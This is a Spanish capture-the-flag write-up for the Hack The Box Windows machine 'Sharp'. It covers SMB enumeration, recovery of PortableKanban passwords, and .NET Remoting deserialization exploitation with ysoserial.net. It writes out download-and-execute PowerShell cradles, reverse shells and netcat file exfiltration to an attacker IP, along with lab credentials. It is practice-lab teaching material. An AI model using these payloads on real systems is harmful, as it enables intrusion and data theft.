# Sharp

**OS**: Windows \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- smbclient / smbmap
- PortableKanban passwords
- dnSpy
- CVE-2014-1806 / CVE-2014-4149
- ExploitRemotingService
- YSoSerial.Net
- Visual Studio

## Nmap Scan

`nmap -sV -sC -p- -oN sharp.txt 10.10.10.219`

```
Nmap scan report for 10.10.10.219
Host is up (0.068s latency).
Not shown: 65529 filtered ports
PORT     STATE SERVICE            VERSION
135/tcp  open  msrpc              Microsoft Windows RPC
139/tcp  open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5985/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open  storagecraft-image StorageCraft Image Manager
8889/tcp open  mc-nmf             .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

Enumerando los puertos **135, 139 y 445** con las herramientas smbclient y smbmap, hay 2 directorios compartidos interesante **dev** y **kaban**, solo tenemos acceso al directorio **kaban** con Anonymous login.

- `smbclient -L 10.10.10.219`
- `smbmap -H 10.10.10.219`

![1](img/1.png)

Al acceder al directorio nos encontramos con varios archivos, entre ellos los más importantes **pkb.zip** y **PortableKanban.pk3.bak**, los descargamos a nuestro sistema.

- `smbclient //10.10.10.219/Kanban`
- `get pkb.zip`
- `get PortableKanban.pk3.bak`

![2](img/2.png)

Revisando el archivo **PortableKanban.pk3.bak** contiene un par de usuarios con su password cifrado.

`cat PortableKanban.pk3.bak`

![3](img/3.png)

### PortableKanban passwords

**Para realizar el resto de la máquina utilizaremos un Sistema Operativo Windows**.

Extraemos los archivos del **pkb.zip** y ejecutamos el programa **PortableKanban.exe**. Dejaremos todas las opciones por defecto e iniciaremos sesión con el usuario **Administrator** sin password.

![4](img/4.png)

![5](img/5.png)

Al ejecutar el programa e iniciar sesión se genera el archivo **PortableKanban.pk3** y **PortableKanban.pk3.bak**.

![6](img/6.png)

Estos archivos son los que contienen los passwords por lo que los modificaremos para poder ver el password del usuario **lars** en texto plano.

![7](img/7.png)

![8](img/8.png)

Una vez modificados los archivos volveremos a abrir el programa y en la parte de **Setup/Users** veremos el password en texto plano.

![9](img/9.png)

```
lars : G123HHrth234gRG
```

### Reversing dnSpy

Ahora es posible acceder al directorio **dev** con las credenciales obtenidas.

`smbmap -u lars -p G123HHrth234gRG -H 10.10.10.219`

![10](img/10.png)

Descargamos nuevamente los archivos que se encuentran en el directorio compartido.

- `smbclient -U lars //10.10.10.219/dev`
- `get Client.exe`
- `get notes.txt`
- `get RemotingLibrary.dll`
- `get Server.exe`

![11](img/11.png)

Movemos los archivos a nuestra máquina Windows y utilizando **dnSpy** podemos hacer reversing de los binarios **Client.exe** y **Server.exe**. Encontramos un endpoint, usuario y password en **Client.exe**.

![12](img/12.png)

```
tcp://127.0.0.1:8888/SecretSharpDebugApplicationEndpoint
debug : SharpApplicationDebugUserPassword123!
```

En **Server.exe** podemos ver que levanta un servidor en el puerto **8888** y algo importante es que usa una librería llamada **Serealization**.

![13](img/13.png)

### ExploitRemotingService

Investigando todo lo anterior llegamos al siguiente [repositorio](ExploitRemotingService) que nos permite explotar la vulnerabilidad encontrada en **Remoting Service**. \
Es necesario compilar el proyecto con Visual Studio, dejaré el [binario](exploit/ExploitRemotingService.zip) previamente compilado. \
Ya que este ataque requiere un payload serializado utilizaremos **YSoSerial.Net** para crearlo.

Primero haremos una prueba local para saber si se está ejecutando correctamente el exploit. Ejecutamos el programa **Server.exe**, generamos nuestro payload serializado y posteriormente ejecutamos el exploit.

- `ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IWR http://127.0.0.1/"`
- `python -m http.server 80`
- `ExploitRemotingService.exe -s tcp://127.0.0.1:8888/SecretSharpDebugApplicationEndpoint raw <base64>`

![14](img/14.png)

Podemos ver que recibimos correctamente la petición en nuestro servidor web Python.

Repitiendo los mismos pasos solo necesitaríamos modificar nuestro payload y agregar las credenciales que obtuvimos en **Client.exe** al momento de ejecutar el exploit.

Utilizaremos la reverse shell del repositorio [nishang](https://github.com/samratashok/nishang) y agregaremos la siguiente línea al final del archivo **Invoke-PowerShellTcp.ps1**:

`Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.109 -Port 4444`

Posteriormente realizamos todo el proceso anterior.

- `ysoserial.exe -f BinaryFormatter -o base64 -g TypeConfuseDelegate -c "powershell IEX(New-Object Net.Webclient).DownloadString('http://10.10.15.109/Invoke-PowerShellTcp.ps1')"`
- `python -m http.server 80`
- `nc64.exe -lvnp 4444`
- `ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw <base64>`

![15](img/15.png)

## Escalada de Privilegios

Enumerando los archivos encontramos el directorio **wcf** el cual es un proyecto en Visual Studio.

![16](img/16.png)

Subiremos netcat al sistema para obtener una shell más estable.

- `IWR http://10.10.15.109/nc64.exe -Outfile C:\users\lars\documents\nc64.exe`
- `nc64.exe -lvnp 1234`
- `.\nc64.exe -e cmd.exe 10.10.15.109 1234`

![17](img/17.png)

Empaquetamos el directorio **wfc** en un ZIP con powershell y nos transferiremos **wcf.zip** con netcat.

- `powershell Compress-Archive wcf wcf.zip`
- `nc64.exe -lvnp 4545 > wcf.zip`
- `nc64.exe -w 40 10.10.15.109 4545 < wcf.zip`

![18](img/18.png)

Extraemos los archivos en nuestra máquina y abrimos el proyecto en Visual Studio.

En **RemotingLibrary/Remoting.cs** encontramos una función llamada **InvokePowershell** que no se está usando en **Client/Program.cs**.

![19](img/19.png)

Agregamos la siguiente línea en **Client/Program.cs** para invocar la función y obtener nuestra reverse shell.

`Console.WriteLine(client.InvokePowerShell("IEX(New-Object Net.Webclient).DownloadString('http://10.10.15.109/Invoke-PowerShellTcp.ps1')"));`

![20](img/20.png)

Utilizaremos el mismo script de la primera reverse shell y modificaremos el puerto en la última línea.

`Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.109 -Port 4321`

Compilamos el proyecto y lo descargamos en la máquina víctima.

- `powershell IWR http://10.10.15.109/wcf-exploit.zip -Outfile C:\users\lars\documents\wcf-exploit.zip`
- `powershell Expand-Archive wcf-exploit.zip`

![21](img/21.png)

Podemos ver los siguientes archivos de nuestro proyecto compilado.

![22](img/22.png)

Solo necesitaríamos ejecutar el programa **WcfClient.exe**.

- `nc64.exe -lvnp 4321`
- `WcfClient.exe`

![23](img/23.png)

## Referencias
https://github.com/dnSpy/dnSpy \
https://github.com/tyranid/ExploitRemotingService \
https://github.com/pwntester/ysoserial.net \
https://github.com/samratashok/nishang \
https://eternallybored.org/misc/netcat/